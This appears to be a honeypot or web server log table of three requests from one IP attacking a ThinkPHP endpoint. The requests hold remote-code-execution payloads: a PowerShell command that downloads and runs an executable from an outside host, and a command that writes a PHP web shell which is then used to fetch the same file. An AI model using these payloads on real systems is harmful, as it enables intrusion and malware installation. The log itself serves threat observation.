| timestamp | ip | host | browser | uri |
|---|
| 20190505-19:28:00 | 41.226.250.222 | 41.226.250.222 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/fjbyiaywphbsnma3759.exe');start C:/Windows/temp/fjbyiaywphbsnma3759.exe |
| 20190505-19:28:01 | 41.226.250.222 | 41.226.250.222 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php |
| 20190505-19:28:01 | 41.226.250.222 | 41.226.250.222 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/fjbyiaywphbsnma3759.exe');start C:/Windows/temp/fjbyiaywphbsnma3759.exe |